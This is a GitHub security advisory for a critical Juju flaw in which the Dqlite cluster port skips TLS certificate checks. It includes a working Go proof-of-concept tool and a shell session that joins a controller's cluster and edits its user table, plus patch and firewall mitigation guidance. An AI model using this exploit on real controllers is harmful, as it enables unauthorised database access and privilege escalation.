GHSA-GVRJ-CJCH-728P

Vulnerability from github – Published: 2026-04-02 00:03 – Updated: 2026-04-08 11:57
VLAI?
Summary
Juju has Improper TLS Client/Server authentication and certificate verification on Database Cluster
Details

Impact

Any Juju controller since 3.2.0.

An attacker with only route-ability to the target juju controller Dqlite cluster endpoint may join the Dqlite cluster, read and modify all information, including escalating privileges, open firewall ports etc.

This is due to not checking the client certificate, additionally, the client does not check the server's certificate (MITM attack possible), so anything goes.

https://github.com/juju/juju/blob/001318f51ac456602aef20b123684f1eeeae9a77/internal/database/node.go#L312-L324

PoC

Using the tool referenced below.

Bootstrap a controller and show the users:

$ juju bootstrap lxd a
Creating Juju controller "a" on lxd/localhost
Looking for packaged Juju agent version 4.0.4 for amd64
<...>
Launching controller instance(s) on localhost/localhost...
 - juju-fefd2b-0 (arch=amd64)
Installing Juju agent on bootstrap instance
Waiting for address
Attempting to connect to 10.151.236.15:22
<...>
Contacting Juju controller at 10.151.236.15 to verify accessibility...

Bootstrap complete, controller "a" is now available
Controller machines are in the "controller" model

Now you can run
    juju add-model <model-name>
to create a new model to deploy workloads.
$ juju users
Controller: a

Name               Display name  Access     Date created  Last connection
admin*             admin         superuser  1 minute ago  just now
juju-metrics       Juju Metrics  login      1 minute ago  never connected
everyone@external

Join the cluster with the first cluster member:

$ dqlite-demo --db 192.168.1.25:9999 --join 10.151.236.15:17666
dqlite interactive shell.
Enter SQL statements terminated with a semicolon.
Meta-commands: .switch <database>  .close  .exit

Connected to database "demo".
demo>

Join the cluster with another cluster member and give the admin a new name:

dqlite-demo --db 192.168.1.25:9998 --join 10.151.236.15:17666
dqlite interactive shell.
Enter SQL statements terminated with a semicolon.
Meta-commands: .switch <database>  .close  .exit

Connected to database "demo".
demo> .switch controller
Connected to database "controller".
controller> select * from user;
uuid                                 | name              | display_name | external | removed | created_by_uuid                      | created_at
-------------------------------------+-------------------+--------------+----------+---------+--------------------------------------+----------------------------------------
9d5c7126-1401-4ce6-8603-6a6b5ac90d23 | admin             | admin        | false    | false   | 9d5c7126-1401-4ce6-8603-6a6b5ac90d23 | 2026-03-17 06:38:25.816694339 +0000 UTC
4e1d65ae-564e-4c0e-8ef6-da8b7fb69b53 | juju-metrics      | Juju Metrics | false    | false   | 9d5c7126-1401-4ce6-8603-6a6b5ac90d23 | 2026-03-17 06:38:26.76549689 +0000 UTC
384c57af-57b1-40be-8e6e-7360371895d3 | everyone@external |              | true     | false   | 9d5c7126-1401-4ce6-8603-6a6b5ac90d23 | 2026-03-17 06:38:26.770215095 +0000 UTC
(3 row(s))
controller> update user set display_name='Silly Admin' where name='admin';
OK (1 row(s) affected)
controller>

The admin won't like this new name:

$ juju users
Controller: a

Name               Display name  Access     Date created   Last connection
admin*             Silly Admin   superuser  6 minutes ago  just now
juju-metrics       Juju Metrics  login      6 minutes ago  never connected
everyone@external

Patches

Juju versions 3.6.20 and 4.0.5 are patched to fix this issue.

Workarounds

The strongest protection is to apply the security updates. The following mitigations have also been explored. If security updates cannot be applied, you should only apply the following steps as a last resort and restore the original configuration file once updates are applied. Please note that modifying configuration files may stop future unattended upgrades from completing successfully, until these are reverted to the original content.

Option 1: Disable the HA (High Availability) controller. If your environment does not strictly require HA, reducing the cluster to a single controller removes the need for DQlite replication. Moreover, the port that replicates the vulnerability should be blocked, namely 17666. Option 2: Restrict what IPs can communicate with port 17666, by implementing firewall rules to block all ingress traffic to this port. Only Juju controller IPs should be able to connect to this port.

To restrict access to the DQlite port to just the set of controller IPs, here's an example using ufw for a machine controller. This needs to be run on each controller. If the controller nodes change configuration, the rules will need to be updated accordingly. You will need to enable access to the controller API port 17070 in accordance with your requirements for allowing clients to connect to the Juju controllers.

# Retrict access to the Dqlite port.
sudo ufw allow from <controllerip1> to any port 17666 proto tcp
sudo ufw allow from <controllerip2> to any port 17666 proto tcp
sudo ufw allow from <controllerip3> to any port 17666 proto tcp
sudo ufw deny 17666/tcp
# Similarly, the mongo db port needs to allow controller access.
sudo ufw allow from <controllerip1> to any port 37017 proto tcp
sudo ufw allow from <controllerip2> to any port 37017 proto tcp
sudo ufw allow from <controllerip3> to any port 37017 proto tcp
sudo ufw deny 37017/tcp
# Allow access to the controller API port.
sudo ufw allow from <your cidr goes here> to any port 17070 proto tcp
# Allow access to the controller SSH port.
sudo ufw allow from <your cidr goes here> to any port 22 proto tcp
# Ensure the firewall is enabled.
sudo ufw enable
# Check that the rules have been added correctly.
sudo ufw status

For Kubernetes controllers, HA is not supported. We recommend blocking access to port 17666. One way is to apply a network policy:

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: controller-0-17666-only-itself
  namespace: <your controller namespace goes here>
spec:
  podSelector:
    matchLabels:
      app.kubernetes.io/name: controller
      statefulset.kubernetes.io/pod-name: controller-0
  policyTypes:
    - Ingress
  ingress:
    - from:
        - podSelector:
            matchLabels:
              app.kubernetes.io/name: controller
              statefulset.kubernetes.io/pod-name: controller-0
      ports:
        - protocol: TCP
          port: 17666

References

https://github.com/juju/juju/blob/001318f51ac456602aef20b123684f1eeeae9a77/internal/database/node.go#L312-L324

PoC Tool

Based on the go-dqlite demo app.

package main

import (
    "context"
    "crypto/ecdsa"
    "crypto/elliptic"
    "crypto/rand"
    "crypto/tls"
    "crypto/x509"
    "crypto/x509/pkix"
    "database/sql"
    "encoding/pem"
    "fmt"
    "log"
    "math/big"
    "net"
    "os"
    "os/signal"
    "path/filepath"
    "strings"
    "time"

    "github.com/canonical/go-dqlite/v3/app"
    "github.com/canonical/go-dqlite/v3/client"
    "github.com/peterh/liner"
    "github.com/pkg/errors"
    "github.com/spf13/cobra"
    "golang.org/x/sys/unix"
)

func generateSelfSignedCert() (tls.Certificate, error) {
    key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
    if err != nil {
        return tls.Certificate{}, fmt.Errorf("generate key: %w", err)
    }

    tmpl := &x509.Certificate{
        SerialNumber: big.NewInt(1),
        Subject:      pkix.Name{CommonName: "lol"},
        NotBefore:    time.Now(),
        NotAfter:     time.Now().Add(365 * 24 * time.Hour),
        KeyUsage:     x509.KeyUsageKeyEncipherment | x509.KeyUsageDigitalSignature,
        ExtKeyUsage:  []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
        IPAddresses:  []net.IP{net.ParseIP("127.0.0.1")},
        DNSNames:     []string{"lol"},
    }

    certDER, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
    if err != nil {
        return tls.Certificate{}, fmt.Errorf("create cert: %w", err)
    }

    keyDER, err := x509.MarshalECPrivateKey(key)
    if err != nil {
        return tls.Certificate{}, fmt.Errorf("marshal key: %w", err)
    }

    certPEM := pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: certDER})
    keyPEM := pem.EncodeToMemory(&pem.Block{Type: "EC PRIVATE KEY", Bytes: keyDER})

    return tls.X509KeyPair(certPEM, keyPEM)
}

// runREPL runs an interactive SQL REPL against the given dqlite app.
// It supports multi-line statements (terminated by ';') and the meta-commands
// .switch <database>, .close, and .exit.
func runREPL(ctx context.Context, dqliteApp *app.App, initialDBName string, line *liner.State) error {
    var currentDB *sql.DB
    var currentDBName string

    openDB := func(name string) error {
        if currentDB != nil {
            if err := currentDB.Close(); err != nil {
                fmt.Fprintf(os.Stderr, "Warning: closing previous database: %v\n", err)
            }
            currentDB = nil
            currentDBName = ""
        }
        db, err := dqliteApp.Open(ctx, name)
        if err != nil {
            return fmt.Errorf("open database %q: %w", name, err)
        }
        currentDB = db
        currentDBName = name
        fmt.Printf("Connected to database %q.\n", name)
        return nil
    }

    defer func() {
        if currentDB != nil {
            currentDB.Close()
        }
    }()

    fmt.Println("dqlite interactive shell.")
    fmt.Println("Enter SQL statements terminated with a semicolon.")
    fmt.Println("Meta-commands: .switch <database>  .close  .exit")
    fmt.Println()

    if initialDBName != "" {
        if err := openDB(initialDBName); err != nil {
            return err
        }
    } else {
        fmt.Println("No database selected. Use .switch <database> to open one.")
    }

    prompt := func(multiline bool) string {
        if multiline {
            return "   ...> "
        }
        if currentDBName != "" {
            return currentDBName + "> "
        }
        return "(no db)> "
    }

    var buf strings.Builder

    for {
        input, err := line.Prompt(prompt(buf.Len() > 0))
        if err != nil {
            if err == liner.ErrPromptAborted {
                if buf.Len() > 0 {
                    buf.Reset()
                    fmt.Println("(statement aborted)")
                }
                continue
            }
            // EOF (Ctrl-D) or liner closed externally — exit cleanly.
            fmt.Println()
            break
        }

        if input != "" {
            line.AppendHistory(input)
        }

        trimmed := strings.TrimSpace(input)
        if trimmed == "" {
            continue
        }

        // Meta-commands are only recognised at the start of a fresh statement.
        if buf.Len() == 0 && strings.HasPrefix(trimmed, ".") {
            parts := strings.Fields(trimmed)
            switch parts[0] {
            case ".exit":
                return nil

            case ".close":
                if currentDB != nil {
                    if err := currentDB.Close(); err != nil {
                        fmt.Fprintf(os.Stderr, "Error closing database: %v\n", err)
                    } else {
                        fmt.Printf("Database %q closed.\n", currentDBName)
                    }
                    currentDB = nil
                    currentDBName = ""
                } else {
                    fmt.Println("No database is currently open.")
                }

            case ".switch":
                if len(parts) < 2 {
                    fmt.Fprintln(os.Stderr, "Usage: .switch <database>")
                } else {
                    if err := openDB(parts[1]); err != nil {
                        fmt.Fprintf(os.Stderr, "Error: %v\n", err)
                    }
                }

            default:
                fmt.Fprintf(os.Stderr, "Unknown meta-command: %s\n", parts[0])
                fmt.Fprintln(os.Stderr, "Available meta-commands: .switch <database>  .close  .exit")
            }
            continue
        }

        // Accumulate SQL across lines.
        if buf.Len() > 0 {
            buf.WriteByte('\n')
        }
        buf.WriteString(input)

        // Execute once the statement is terminated with a semicolon.
        stmt := strings.TrimSpace(buf.String())
        if strings.HasSuffix(stmt, ";") {
            buf.Reset()
            if currentDB == nil {
                fmt.Fprintln(os.Stderr, "Error: no database open. Use .switch <database> to open one.")
                continue
            }
            if err := execSQL(currentDB, stmt); err != nil {
                fmt.Fprintf(os.Stderr, "Error: %v\n", err)
            }
        }
    }

    return nil
}

// execSQL dispatches to execQuery or execStatement based on the leading keyword.
func execSQL(db *sql.DB, stmt string) error {
    // Trim the trailing semicolon just for the prefix check.
    upper := strings.ToUpper(strings.TrimSpace(strings.TrimSuffix(strings.TrimSpace(stmt), ";")))
    switch {
    case strings.HasPrefix(upper, "SELECT"),
        strings.HasPrefix(upper, "WITH"),
        strings.HasPrefix(upper, "PRAGMA"),
        strings.HasPrefix(upper, "EXPLAIN"):
        return execQuery(db, stmt)
    default:
        return execStatement(db, stmt)
    }
}

// execQuery runs a statement expected to return rows and prints them as a table.
func execQuery(db *sql.DB, stmt string) error {
    rows, err := db.Query(stmt)
    if err != nil {
        return err
    }
    defer rows.Close()

    cols, err := rows.Columns()
    if err != nil {
        return err
    }
    if len(cols) == 0 {
        fmt.Println("OK")
        return nil
    }

    // Initialise column widths from the header names.
    widths := make([]int, len(cols))
    for i, c := range cols {
        widths[i] = len(c)
    }

    // Scan all rows into memory so we can compute column widths before printing.
    vals := make([]interface{}, len(cols))
    valPtrs := make([]interface{}, len(cols))
    for i := range vals {
        valPtrs[i] = &vals[i]
    }

    var allRows [][]string
    for rows.Next() {
        if err := rows.Scan(valPtrs...); err != nil {
            return err
        }
        row := make([]string, len(cols))
        for i, v := range vals {
            if v == nil {
                row[i] = "NULL"
            } else {
                row[i] = fmt.Sprintf("%v", v)
            }
            if len(row[i]) > widths[i] {
                widths[i] = len(row[i])
            }
        }
        allRows = append(allRows, row)
    }
    if err := rows.Err(); err != nil {
        return err
    }

    printRow(cols, widths)
    printSeparator(widths)
    for _, row := range allRows {
        printRow(row, widths)
    }
    fmt.Printf("(%d row(s))\n", len(allRows))
    return nil
}

// execStatement runs a non-SELECT statement and prints the rows-affected count.
func execStatement(db *sql.DB, stmt string) error {
    result, err := db.Exec(stmt)
    if err != nil {
        return err
    }
    affected, err := result.RowsAffected()
    if err != nil {
        fmt.Println("OK")
        return nil
    }
    fmt.Printf("OK (%d row(s) affected)\n", affected)
    return nil
}

func printRow(vals []string, widths []int) {
    parts := make([]string, len(vals))
    for i, v := range vals {
        parts[i] = fmt.Sprintf("%-*s", widths[i], v)
    }
    fmt.Println(strings.Join(parts, " | "))
}

func printSeparator(widths []int) {
    parts := make([]string, len(widths))
    for i, w := range widths {
        parts[i] = strings.Repeat("-", w)
    }
    fmt.Println(strings.Join(parts, "-+-"))
}

func main() {
    var db string
    var join *[]string
    var dir string
    var verbose bool
    var dbName string

    cmd := &cobra.Command{
        Use:   "dqlite-demo",
        Short: "Interactive dqlite SQL REPL",
        Long: `An interactive SQL REPL backed by a dqlite cluster node.

Type SQL statements terminated with a semicolon (;) to execute them.
Statements can span multiple lines.

Meta-commands:
  .switch <database>   Open (or switch to) a named database
  .close               Close the current database connection
  .exit                Exit the REPL

Complete documentation is available at https://github.com/canonical/go-dqlite`,
        RunE: func(cmd *cobra.Command, args []string) error {
            nodeDir := filepath.Join(dir, db)
            if err := os.MkdirAll(nodeDir, 0755); err != nil {
                return errors.Wrapf(err, "can't create %s", nodeDir)
            }

            logFunc := func(l client.LogLevel, format string, a ...interface{}) {
                if !verbose {
                    return
                }
                log.Printf(fmt.Sprintf("%s: %s: %s\n", db, l.String(), format), a...)
            }

            cart, err := generateSelfSignedCert()
            if err != nil {
                return err
            }
            options := []app.Option{
                app.WithAddress(db),
                app.WithCluster(*join),
                app.WithLogFunc(logFunc),
                app.WithTLS(&tls.Config{
                    InsecureSkipVerify: true,
                    ClientCAs:          x509.NewCertPool(),
                    Certificates:       []tls.Certificate{cart},
                }, &tls.Config{
                    InsecureSkipVerify: true,
                }),
            }

            dqliteApp, err := app.New(nodeDir, options...)
            if err != nil {
                return err
            }
            defer func() {
                dqliteApp.Handover(context.Background())
                dqliteApp.Close()
            }()

            if err := dqliteApp.Ready(context.Background()); err != nil {
                return err
            }

            line := liner.NewLiner()
            line.SetCtrlCAborts(true)
            defer line.Close()

            // Forward termination signals by closing the liner, which causes
            // Prompt() to return and the REPL loop to exit cleanly.
            sigCh := make(chan os.Signal, 32)
            signal.Notify(sigCh, unix.SIGPWR, unix.SIGQUIT, unix.SIGTERM)
            go func() {
                <-sigCh
                line.Close()
            }()

            return runREPL(context.Background(), dqliteApp, dbName, line)
        },
    }

    flags := cmd.Flags()
    flags.StringVarP(&db, "db", "d", "", "address used for internal database replication")
    join = flags.StringSliceP("join", "j", nil, "database addresses of existing nodes")
    flags.StringVarP(&dir, "dir", "D", "/tmp/dqlite-demo", "data directory")
    flags.BoolVarP(&verbose, "verbose", "v", false, "verbose logging")
    flags.StringVarP(&dbName, "name", "n", "controller", "initial database name to open on startup")

    cmd.MarkFlagRequired("db")

    if err := cmd.Execute(); err != nil {
        os.Exit(1)
    }
}

Mitigation

The strongest protection is to apply the security updates. The following mitigations have also been explored. If security updates cannot be applied, you should only apply the following steps as a last resort and restore the original configuration file once updates are applied. Please note that modifying configuration files may stop future unattended upgrades from completing successfully, until these are reverted to the original content.

Option 1: Disable the HA (High Availability) controller. If your environment does not strictly require HA, reducing the cluster to a single controller removes the need for DQlite replication. Moreover, the port that replicates the vulnerability should be blocked, namely 17666. Option 2: Restrict what IPs can communicate with port 17666, by implementing firewall rules to block all ingress traffic to this port. Only Juju controller IPs should be able to connect to this port.

To restrict access to the DQlite port to just the set of controller IPs, here's an example using ufw for a machine controller. This needs to be run on each controller. If the controller nodes change configuration, the rules will need to be updated accordingly. You will need to enable access to the controller API port 17070 in accordance with your requirements for allowing clients to connect to the Juju controllers.

# Retrict access to the Dqlite port.
sudo ufw allow from <controllerip1> to any port 17666 proto tcp
sudo ufw allow from <controllerip2> to any port 17666 proto tcp
sudo ufw allow from <controllerip3> to any port 17666 proto tcp
sudo ufw deny 17666/tcp
# Similarly, the mongo db port needs to allow controller access.
sudo ufw allow from <controllerip1> to any port 37017 proto tcp
sudo ufw allow from <controllerip2> to any port 37017 proto tcp
sudo ufw allow from <controllerip3> to any port 37017 proto tcp
sudo ufw deny 37017/tcp
# Allow access to the controller API port.
sudo ufw allow from <your cidr goes here> to any port 17070 proto tcp
# Allow access to the controller SSH port.
sudo ufw allow from <your cidr goes here> to any port 22 proto tcp
# Ensure the firewall is enabled.
sudo ufw enable
# Check that the rules have been added correctly.
sudo ufw status

For Kubernetes controllers, HA is not supported. We recommend blocking access to port 17666. One way is to apply a network policy:

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: controller-0-17666-only-itself
  namespace: <your controller namespace goes here>
spec:
  podSelector:
    matchLabels:
      app: controller
      statefulset.kubernetes.io/pod-name: controller-0
  policyTypes:
    - Ingress
  ingress:
    - from:
        - podSelector:
            matchLabels:
              app: controller
              statefulset.kubernetes.io/pod-name: controller-0
      ports:
        - protocol: TCP
          port: 17666
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/juju/juju"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.0.0-20260401092550-1c1ac1922b57"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-4370"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287",
      "CWE-295",
      "CWE-296"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-02T00:03:36Z",
    "nvd_published_at": "2026-04-01T09:16:17Z",
    "severity": "CRITICAL"
  },
  "details": "### Impact\nAny Juju controller since 3.2.0.\n\nAn attacker with only route-ability to the target juju controller Dqlite cluster endpoint\nmay join the Dqlite cluster, read and modify all information, including escalating privileges,\nopen firewall ports etc.\n\nThis is due to not checking the client certificate, additionally, the client does not\ncheck the server\u0027s certificate (MITM attack possible), so anything goes.\n\nhttps://github.com/juju/juju/blob/001318f51ac456602aef20b123684f1eeeae9a77/internal/database/node.go#L312-L324\n\n#### PoC\nUsing the tool referenced below.\n\nBootstrap a controller and show the users:\n```\n$ juju bootstrap lxd a\nCreating Juju controller \"a\" on lxd/localhost\nLooking for packaged Juju agent version 4.0.4 for amd64\n\u003c...\u003e\nLaunching controller instance(s) on localhost/localhost...\n - juju-fefd2b-0 (arch=amd64)\nInstalling Juju agent on bootstrap instance\nWaiting for address\nAttempting to connect to 10.151.236.15:22\n\u003c...\u003e\nContacting Juju controller at 10.151.236.15 to verify accessibility...\n\nBootstrap complete, controller \"a\" is now available\nController machines are in the \"controller\" model\n\nNow you can run\n\tjuju add-model \u003cmodel-name\u003e\nto create a new model to deploy workloads.\n$ juju users\nController: a\n\nName               Display name  Access     Date created  Last connection\nadmin*             admin         superuser  1 minute ago  just now\njuju-metrics       Juju Metrics  login      1 minute ago  never connected\neveryone@external\n```\n\nJoin the cluster with the first cluster member:\n```\n$ dqlite-demo --db 192.168.1.25:9999 --join 10.151.236.15:17666\ndqlite interactive shell.\nEnter SQL statements terminated with a semicolon.\nMeta-commands: .switch \u003cdatabase\u003e  .close  .exit\n\nConnected to database \"demo\".\ndemo\u003e\n```\n\nJoin the cluster with another cluster member and give the admin a new name:\n```\ndqlite-demo --db 192.168.1.25:9998 --join 10.151.236.15:17666\ndqlite interactive shell.\nEnter SQL statements terminated with a semicolon.\nMeta-commands: .switch \u003cdatabase\u003e  .close  .exit\n\nConnected to database \"demo\".\ndemo\u003e .switch controller\nConnected to database \"controller\".\ncontroller\u003e select * from user;\nuuid                                 | name              | display_name | external | removed | created_by_uuid                      | created_at\n-------------------------------------+-------------------+--------------+----------+---------+--------------------------------------+----------------------------------------\n9d5c7126-1401-4ce6-8603-6a6b5ac90d23 | admin             | admin        | false    | false   | 9d5c7126-1401-4ce6-8603-6a6b5ac90d23 | 2026-03-17 06:38:25.816694339 +0000 UTC\n4e1d65ae-564e-4c0e-8ef6-da8b7fb69b53 | juju-metrics      | Juju Metrics | false    | false   | 9d5c7126-1401-4ce6-8603-6a6b5ac90d23 | 2026-03-17 06:38:26.76549689 +0000 UTC\n384c57af-57b1-40be-8e6e-7360371895d3 | everyone@external |              | true     | false   | 9d5c7126-1401-4ce6-8603-6a6b5ac90d23 | 2026-03-17 06:38:26.770215095 +0000 UTC\n(3 row(s))\ncontroller\u003e update user set display_name=\u0027Silly Admin\u0027 where name=\u0027admin\u0027;\nOK (1 row(s) affected)\ncontroller\u003e\n```\n\nThe admin won\u0027t like this new name:\n```\n$ juju users\nController: a\n\nName               Display name  Access     Date created   Last connection\nadmin*             Silly Admin   superuser  6 minutes ago  just now\njuju-metrics       Juju Metrics  login      6 minutes ago  never connected\neveryone@external\n```\n\n### Patches\nJuju versions 3.6.20 and 4.0.5 are patched to fix this issue.\n\n### Workarounds\nThe strongest protection is to apply the security updates. The following mitigations have also been explored. If security updates cannot be applied, you should only apply the following steps as a last resort and restore the original configuration file once updates are applied. Please note that modifying configuration files may stop future unattended upgrades from completing successfully, until these are reverted to the original content.\n\nOption 1: Disable the HA (High Availability) controller. If your environment does not strictly require HA, reducing the cluster to a single controller removes the need for DQlite replication. Moreover, the port that replicates the vulnerability should be blocked, namely 17666.\nOption 2: Restrict what IPs can communicate with port 17666, by implementing firewall rules to block all ingress traffic to this port. Only Juju controller IPs should be able to connect to this port.\n\nTo restrict access to the DQlite port to just the set of controller IPs, here\u0027s an example using ufw for a machine controller. This needs to be run on each controller. If the controller nodes change configuration, the rules will need to be updated accordingly.\nYou will need to enable access to the controller API port 17070 in accordance with your requirements for allowing clients to connect to the Juju controllers.\n\n```\n# Retrict access to the Dqlite port.\nsudo ufw allow from \u003ccontrollerip1\u003e to any port 17666 proto tcp\nsudo ufw allow from \u003ccontrollerip2\u003e to any port 17666 proto tcp\nsudo ufw allow from \u003ccontrollerip3\u003e to any port 17666 proto tcp\nsudo ufw deny 17666/tcp\n# Similarly, the mongo db port needs to allow controller access.\nsudo ufw allow from \u003ccontrollerip1\u003e to any port 37017 proto tcp\nsudo ufw allow from \u003ccontrollerip2\u003e to any port 37017 proto tcp\nsudo ufw allow from \u003ccontrollerip3\u003e to any port 37017 proto tcp\nsudo ufw deny 37017/tcp\n# Allow access to the controller API port.\nsudo ufw allow from \u003cyour cidr goes here\u003e to any port 17070 proto tcp\n# Allow access to the controller SSH port.\nsudo ufw allow from \u003cyour cidr goes here\u003e to any port 22 proto tcp\n# Ensure the firewall is enabled.\nsudo ufw enable\n# Check that the rules have been added correctly.\nsudo ufw status\n```\n\nFor Kubernetes controllers, HA is not supported. We recommend blocking access to port 17666. One way is to apply a network policy:\n\n```\napiVersion: networking.k8s.io/v1\nkind: NetworkPolicy\nmetadata:\n  name: controller-0-17666-only-itself\n  namespace: \u003cyour controller namespace goes here\u003e\nspec:\n  podSelector:\n    matchLabels:\n      app.kubernetes.io/name: controller\n      statefulset.kubernetes.io/pod-name: controller-0\n  policyTypes:\n    - Ingress\n  ingress:\n    - from:\n        - podSelector:\n            matchLabels:\n              app.kubernetes.io/name: controller\n              statefulset.kubernetes.io/pod-name: controller-0\n      ports:\n        - protocol: TCP\n          port: 17666\n```\n\n### References\nhttps://github.com/juju/juju/blob/001318f51ac456602aef20b123684f1eeeae9a77/internal/database/node.go#L312-L324\n\n### PoC Tool\n\nBased on the go-dqlite demo app.\n\n```go\npackage main\n\nimport (\n\t\"context\"\n\t\"crypto/ecdsa\"\n\t\"crypto/elliptic\"\n\t\"crypto/rand\"\n\t\"crypto/tls\"\n\t\"crypto/x509\"\n\t\"crypto/x509/pkix\"\n\t\"database/sql\"\n\t\"encoding/pem\"\n\t\"fmt\"\n\t\"log\"\n\t\"math/big\"\n\t\"net\"\n\t\"os\"\n\t\"os/signal\"\n\t\"path/filepath\"\n\t\"strings\"\n\t\"time\"\n\n\t\"github.com/canonical/go-dqlite/v3/app\"\n\t\"github.com/canonical/go-dqlite/v3/client\"\n\t\"github.com/peterh/liner\"\n\t\"github.com/pkg/errors\"\n\t\"github.com/spf13/cobra\"\n\t\"golang.org/x/sys/unix\"\n)\n\nfunc generateSelfSignedCert() (tls.Certificate, error) {\n\tkey, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)\n\tif err != nil {\n\t\treturn tls.Certificate{}, fmt.Errorf(\"generate key: %w\", err)\n\t}\n\n\ttmpl := \u0026x509.Certificate{\n\t\tSerialNumber: big.NewInt(1),\n\t\tSubject:      pkix.Name{CommonName: \"lol\"},\n\t\tNotBefore:    time.Now(),\n\t\tNotAfter:     time.Now().Add(365 * 24 * time.Hour),\n\t\tKeyUsage:     x509.KeyUsageKeyEncipherment | x509.KeyUsageDigitalSignature,\n\t\tExtKeyUsage:  []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},\n\t\tIPAddresses:  []net.IP{net.ParseIP(\"127.0.0.1\")},\n\t\tDNSNames:     []string{\"lol\"},\n\t}\n\n\tcertDER, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, \u0026key.PublicKey, key)\n\tif err != nil {\n\t\treturn tls.Certificate{}, fmt.Errorf(\"create cert: %w\", err)\n\t}\n\n\tkeyDER, err := x509.MarshalECPrivateKey(key)\n\tif err != nil {\n\t\treturn tls.Certificate{}, fmt.Errorf(\"marshal key: %w\", err)\n\t}\n\n\tcertPEM := pem.EncodeToMemory(\u0026pem.Block{Type: \"CERTIFICATE\", Bytes: certDER})\n\tkeyPEM := pem.EncodeToMemory(\u0026pem.Block{Type: \"EC PRIVATE KEY\", Bytes: keyDER})\n\n\treturn tls.X509KeyPair(certPEM, keyPEM)\n}\n\n// runREPL runs an interactive SQL REPL against the given dqlite app.\n// It supports multi-line statements (terminated by \u0027;\u0027) and the meta-commands\n// .switch \u003cdatabase\u003e, .close, and .exit.\nfunc runREPL(ctx context.Context, dqliteApp *app.App, initialDBName string, line *liner.State) error {\n\tvar currentDB *sql.DB\n\tvar currentDBName string\n\n\topenDB := func(name string) error {\n\t\tif currentDB != nil {\n\t\t\tif err := currentDB.Close(); err != nil {\n\t\t\t\tfmt.Fprintf(os.Stderr, \"Warning: closing previous database: %v\\n\", err)\n\t\t\t}\n\t\t\tcurrentDB = nil\n\t\t\tcurrentDBName = \"\"\n\t\t}\n\t\tdb, err := dqliteApp.Open(ctx, name)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"open database %q: %w\", name, err)\n\t\t}\n\t\tcurrentDB = db\n\t\tcurrentDBName = name\n\t\tfmt.Printf(\"Connected to database %q.\\n\", name)\n\t\treturn nil\n\t}\n\n\tdefer func() {\n\t\tif currentDB != nil {\n\t\t\tcurrentDB.Close()\n\t\t}\n\t}()\n\n\tfmt.Println(\"dqlite interactive shell.\")\n\tfmt.Println(\"Enter SQL statements terminated with a semicolon.\")\n\tfmt.Println(\"Meta-commands: .switch \u003cdatabase\u003e  .close  .exit\")\n\tfmt.Println()\n\n\tif initialDBName != \"\" {\n\t\tif err := openDB(initialDBName); err != nil {\n\t\t\treturn err\n\t\t}\n\t} else {\n\t\tfmt.Println(\"No database selected. Use .switch \u003cdatabase\u003e to open one.\")\n\t}\n\n\tprompt := func(multiline bool) string {\n\t\tif multiline {\n\t\t\treturn \"   ...\u003e \"\n\t\t}\n\t\tif currentDBName != \"\" {\n\t\t\treturn currentDBName + \"\u003e \"\n\t\t}\n\t\treturn \"(no db)\u003e \"\n\t}\n\n\tvar buf strings.Builder\n\n\tfor {\n\t\tinput, err := line.Prompt(prompt(buf.Len() \u003e 0))\n\t\tif err != nil {\n\t\t\tif err == liner.ErrPromptAborted {\n\t\t\t\tif buf.Len() \u003e 0 {\n\t\t\t\t\tbuf.Reset()\n\t\t\t\t\tfmt.Println(\"(statement aborted)\")\n\t\t\t\t}\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\t// EOF (Ctrl-D) or liner closed externally \u2014 exit cleanly.\n\t\t\tfmt.Println()\n\t\t\tbreak\n\t\t}\n\n\t\tif input != \"\" {\n\t\t\tline.AppendHistory(input)\n\t\t}\n\n\t\ttrimmed := strings.TrimSpace(input)\n\t\tif trimmed == \"\" {\n\t\t\tcontinue\n\t\t}\n\n\t\t// Meta-commands are only recognised at the start of a fresh statement.\n\t\tif buf.Len() == 0 \u0026\u0026 strings.HasPrefix(trimmed, \".\") {\n\t\t\tparts := strings.Fields(trimmed)\n\t\t\tswitch parts[0] {\n\t\t\tcase \".exit\":\n\t\t\t\treturn nil\n\n\t\t\tcase \".close\":\n\t\t\t\tif currentDB != nil {\n\t\t\t\t\tif err := currentDB.Close(); err != nil {\n\t\t\t\t\t\tfmt.Fprintf(os.Stderr, \"Error closing database: %v\\n\", err)\n\t\t\t\t\t} else {\n\t\t\t\t\t\tfmt.Printf(\"Database %q closed.\\n\", currentDBName)\n\t\t\t\t\t}\n\t\t\t\t\tcurrentDB = nil\n\t\t\t\t\tcurrentDBName = \"\"\n\t\t\t\t} else {\n\t\t\t\t\tfmt.Println(\"No database is currently open.\")\n\t\t\t\t}\n\n\t\t\tcase \".switch\":\n\t\t\t\tif len(parts) \u003c 2 {\n\t\t\t\t\tfmt.Fprintln(os.Stderr, \"Usage: .switch \u003cdatabase\u003e\")\n\t\t\t\t} else {\n\t\t\t\t\tif err := openDB(parts[1]); err != nil {\n\t\t\t\t\t\tfmt.Fprintf(os.Stderr, \"Error: %v\\n\", err)\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\tdefault:\n\t\t\t\tfmt.Fprintf(os.Stderr, \"Unknown meta-command: %s\\n\", parts[0])\n\t\t\t\tfmt.Fprintln(os.Stderr, \"Available meta-commands: .switch \u003cdatabase\u003e  .close  .exit\")\n\t\t\t}\n\t\t\tcontinue\n\t\t}\n\n\t\t// Accumulate SQL across lines.\n\t\tif buf.Len() \u003e 0 {\n\t\t\tbuf.WriteByte(\u0027\\n\u0027)\n\t\t}\n\t\tbuf.WriteString(input)\n\n\t\t// Execute once the statement is terminated with a 